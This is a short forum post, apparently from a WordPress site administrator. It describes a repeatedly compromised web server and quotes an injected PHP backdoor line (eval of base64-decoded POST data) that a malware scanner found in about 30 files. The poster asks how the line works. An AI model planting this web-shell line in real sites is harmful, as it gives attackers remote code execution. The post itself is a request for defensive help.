Hello,
I have had a recent attack on my web server from a compromised WordPress installation. I have had my hoster quell any injections that happen but they still continue to happen. I grabbed a malware scanner and it revealed this string of code riddled through some php files and some actual bad files that shouldnt be there anymore.
Out of pure curiosity, what does the below string do? I have a lot of WP sites to manage and this string isnt present on any of the identical files on the other sites so this looks like a malicious injection. This appears on about 30 files throughout the system and I am curious to know how it compromises the system.
eval(base64_decode($_POST['n21ccad']));the numbers inside the post are different but it is always 7 characters and some are surrounded in single quotes and some surrounded in \'
Thanks for your...